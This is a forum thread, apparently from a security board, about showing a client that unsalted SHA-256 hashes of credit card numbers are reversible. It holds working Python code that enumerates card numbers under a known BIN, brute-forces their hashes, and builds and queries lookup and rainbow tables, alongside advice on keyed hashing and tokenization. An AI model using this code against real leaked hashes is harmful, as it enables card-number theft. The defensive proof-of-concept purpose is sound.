
Posted

Hey all, I'm looking to generate rainbow tables for a PoC. My client has decided that hashing (no salt) credit card numbers is a good idea. To prove him wrong I wrote a little script that will crack the SHA-256 hash iteratively, but with a 9-digit account number (6-digit known bank BIN + account number + check digit = 16-digit card number), this obviously takes a very long time.

To make the PoC more demonstrative, I'd like to generate some custom rainbow tables. I have the first 6 digits, and obviously the last digit will be a check digit. What is the best way to generate these tables?

I've looked at winrtgen and rainbowcrack, but neither gives me the option to prefix the first 6 digits, much less generate the check digit. Any help would be greatly appreciated!

Posted

I don't think there is a solution out there that will allow you to generate rainbow tables for this purpose.

The only way to make it work would be writing custom code that can generate the numbers you want and then have them saved into a text file.
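As an added example (my code, not anything posted in this thread), here is that custom enumeration for the layout the original post describes: a known 6-digit BIN, a 9-digit account number and a Luhn check digit. Because the check digit is derived, only 10**9 card numbers exist under one BIN, so an unsalted SHA-256 is simply brute-forced; no table is needed. The BIN "411111" and the assumption that the client hashes the ASCII digits of the PAN are constructed for the example; `hmac_pan` shows the keyed alternative that a PoC like this should recommend.

```python
import hashlib
import hmac
from typing import Optional

# Assumed example values (not from the original post): a 6-digit issuer BIN and the
# 16-digit layout the poster describes: BIN + 9-digit account number + Luhn check digit.
BIN = "411111"
PAN_LENGTH = 16
ACCOUNT_DIGITS = PAN_LENGTH - len(BIN) - 1   # 9 unknown digits per BIN


def luhn_check_digit(payload: str) -> str:
    """Luhn check digit for a digit string (the PAN without its final digit)."""
    total = 0
    # Walk from the right: the digit next to the check-digit position is doubled first.
    for i, ch in enumerate(reversed(payload)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def luhn_valid(pan: str) -> bool:
    return pan[-1] == luhn_check_digit(pan[:-1])


def pan_from_account(bin_prefix: str, account: int) -> str:
    """Build the full PAN for the `account`-th number under a BIN; only 10**9 exist."""
    payload = bin_prefix + str(account).zfill(ACCOUNT_DIGITS)
    return payload + luhn_check_digit(payload)


def sha256_pan(pan: str) -> str:
    """The weak scheme under discussion: unsalted SHA-256 over the PAN's ASCII digits
    (assumed input format; match whatever bytes the target system really hashes)."""
    return hashlib.sha256(pan.encode("ascii")).hexdigest()


def crack_sha256_pan(target_hex: str, bin_prefix: str,
                     max_account: int = 10 ** ACCOUNT_DIGITS) -> Optional[str]:
    """Recover a PAN from its unsalted SHA-256 by enumerating account numbers under one BIN.

    The Luhn digit is computed, not guessed, so the search space is 10**9 per BIN.
    `max_account` bounds the search so the example runs in a moment.
    """
    target = bytes.fromhex(target_hex)
    for account in range(max_account):
        pan = pan_from_account(bin_prefix, account)
        if hashlib.sha256(pan.encode("ascii")).digest() == target:
            return pan
    return None


def hmac_pan(pan: str, key: bytes) -> str:
    """Hardened form: a keyed hash (HMAC-SHA256) with the key held outside the database.
    Without `key` a candidate cannot be verified, so enumerating 10**9 PANs gives an
    attacker nothing to compare against; a per-record salt would not achieve this."""
    return hmac.new(key, pan.encode("ascii"), hashlib.sha256).hexdigest()


if __name__ == "__main__":
    victim = pan_from_account(BIN, 1234)          # constructed sample PAN
    print("cracked:", crack_sha256_pan(sha256_pan(victim), BIN, max_account=5000))
    print("keyed:  ", crack_sha256_pan(hmac_pan(victim, b"kms-held-key"), BIN, max_account=5000))
```

The point to make to the client is the size of the space, not the choice of algorithm: about 10**9 SHA-256 computations per BIN is minutes on a CPU and seconds on a GPU, and salting does not change that because each record still has only 10**9 possible inputs. A keyed hash (or tokenization / format-preserving encryption with the key in an HSM or KMS) is what removes the attacker's ability to test guesses.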

Posted

The number of unknowns you have is only 10, right?

And assuming they are all numbers, howsecureismypassword.net guesses that it would take a modern PC 40 seconds.

If I get interested enough I may write some Python code to do it.

Posted

Well, I wrote some code to generate the rainbow tables; each entry uses 40 bytes total: 8 bytes for the unencrypted CC number and 32 bytes for the SHA-256 hash.

Working it out though, just generating for a single bank branch number will take around 350 GB of space.

40b * 9999999999 = 399999999960b

399999999960b / 1024 = 390624999.9609375k

390624999.9609375k / 1024 = 381469.726524353M

381469.726524353M / 1024 = 372.529029809G

Total: 372.529029809 Gigabytes

If you have any ideas of how to store the information in a smaller space, let me know.

Not to mention compute time: it took me around a minute to get to 0.000255790000026%, then again my computer is fairly slow.

You could try various options for speeding it up.

  1. Rewrite in C or Assembly
  2. Modify Pyrit to generate your hashes instead.

The code below is fairly simple to use; I'm sure you can figure out how to use it on your own. I left implementing the searcher up to you, although if you do need help, don't hesitate to ask.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#       rtgen.py
#       
#       Copyright 2011 Alias <[email protected]>
#       
#       This program is free software; you can redistribute it and/or modify
#       it under the terms of the GNU General Public License as published by
#       the Free Software Foundation; either version 2 of the License, or
#       (at your option) any later version.
#       
#       This program is distributed in the hope that it will be useful,
#       but WITHOUT ANY WARRANTY; without even the implied warranty of
#       MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#       GNU General Public License for more details.
#       
#       You should have received a copy of the GNU General Public License
#       along with this program; if not, write to the Free Software
#       Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
#       MA 02110-1301, USA.
#       
#       

# Perform imports
import sys, hashlib, struct

# Size of the search space: every 10-digit account number under one bank number
ACCOUNT_DIGITS = 10
TOTAL = 10 ** ACCOUNT_DIGITS
# How often to print progress (printing every 100 entries would dominate the run time)
REPORT_EVERY = 1000000


# Makes sure that the account number is always 10 digits (zero-padded on the left)
def convertK(k):
    return str(k).zfill(ACCOUNT_DIGITS)


# Generates the SHA256 hashes and writes them to a file
def genTable(bankNum):
    bankNum_str = str(bankNum)

    # Each record is 40 bytes: the card number as an 8-byte little-endian integer
    # (16 digits fit in 64 bits), followed by the 32-byte SHA256 digest
    with open("bank" + bankNum_str + ".rt", "wb") as fp:
        # Main loop
        for k in range(TOTAL):
            # Concatenate the bank number and the account number
            string = bankNum_str + convertK(k)

            # Convert the card number to a C integer in bytes (storage form only)
            string_bytes = struct.pack('<q', int(string))

            # Hash the ASCII digits of the card number: a system that "hashes the
            # card number" hashes those bytes, so the table must hash the same input
            hashedString = hashlib.sha256(string.encode('ascii'))

            # Write everything to the file
            fp.write(string_bytes)
            fp.write(hashedString.digest())

            # Print progress (as a real percentage of the whole table)
            if (k % REPORT_EVERY) == 0:
                percentage = 100.0 * k / TOTAL
                print(string, ":  ", hashedString.hexdigest(), "\t", percentage, "% Complete", sep='')

    return 0


def main():
    if len(sys.argv) != 2:
        print("usage: rtgen.py <bank number>", file=sys.stderr)
        return 1
    return genTable(sys.argv[1])


if __name__ == '__main__':
    sys.exit(main())
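On the "store it in a smaller space" question: the script above is a full lookup table (every candidate plus its digest), which is what costs 40 bytes per entry. A rainbow table stores only the start and end point of each hash/reduce chain. The added example below is mine, not the script's author's, and shows the actual construction over the same BIN + 10-digit layout the script enumerates (no Luhn digit, hashing the ASCII digits). The BIN "411111", the 4-digit account width and the chain parameters are constructed so it runs in a moment; the technique is unchanged at full size.

```python
import hashlib
from collections import defaultdict
from typing import Dict, List, Optional


def pan_from_index(bin_prefix: str, k: int, digits: int) -> str:
    """Candidate k -> bank number followed by the zero-padded account number
    (the BIN + 10-digit layout of the script above; no Luhn digit here)."""
    return bin_prefix + str(k).zfill(digits)


def sha256_digest(pan: str) -> bytes:
    return hashlib.sha256(pan.encode("ascii")).digest()


def reduce_digest(digest: bytes, column: int, space: int) -> int:
    """Reduction function: map a digest back into the candidate space. Mixing in the
    column index is what makes this a rainbow table rather than a plain hash chain:
    two chains that collide in different columns no longer merge."""
    return (int.from_bytes(digest[:8], "big") + column) % space


class RainbowTable:
    def __init__(self, bin_prefix: str, digits: int, chain_len: int):
        self.bin_prefix = bin_prefix
        self.digits = digits
        self.space = 10 ** digits
        self.chain_len = chain_len
        # Only start and end points are kept: 16 bytes per chain instead of 40 bytes
        # per candidate, paid for with chain_len extra hashes at lookup time.
        self.ends: Dict[int, List[int]] = defaultdict(list)

    def _step(self, k: int, column: int) -> int:
        digest = sha256_digest(pan_from_index(self.bin_prefix, k, self.digits))
        return reduce_digest(digest, column, self.space)

    def _walk(self, k: int, from_column: int) -> int:
        """Continue a chain whose candidate at `from_column` is k; return its end point."""
        for column in range(from_column, self.chain_len):
            k = self._step(k, column)
        return k

    def build(self, starts) -> None:
        for start in starts:
            self.ends[self._walk(start, 0)].append(start)

    def stored_bytes(self) -> int:
        return 16 * sum(len(v) for v in self.ends.values())

    def lookup(self, digest: bytes) -> Optional[str]:
        """Invert one digest: for each column j, assume the digest sat there, finish the
        chain, and on an end-point match regenerate that chain to read the candidate."""
        for column in range(self.chain_len - 1, -1, -1):
            end = self._walk(reduce_digest(digest, column, self.space), column + 1)
            for start in self.ends.get(end, ()):
                k = start
                for c in range(column):
                    k = self._step(k, c)
                pan = pan_from_index(self.bin_prefix, k, self.digits)
                if sha256_digest(pan) == digest:   # reject false alarms from merged chains
                    return pan
        return None


if __name__ == "__main__":
    # Constructed demo: 10**4 candidates, 300 chains of length 20.
    table = RainbowTable("411111", 4, 20)
    table.build(range(300))
    target = pan_from_index("411111", 4242, 4)
    print("stored bytes:", table.stored_bytes())
    print("lookup:", table.lookup(sha256_digest(target)))   # None if 4242 is not covered
```

With chain length t you need on the order of N/t chains (more in practice, since chains merge and coverage is probabilistic), so for N = 10**10 and t = 10**4 the table is roughly 10**6 chains, or around 16 MB, instead of 372 GB; each lookup then costs about t**2/2 hash operations, which is why real tools use an ordered, sorted end-point file rather than a dict. For a PoC against 10**10 candidates, though, the honest answer is that no table is needed at all: computing the hashes on demand is seconds on a GPU.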
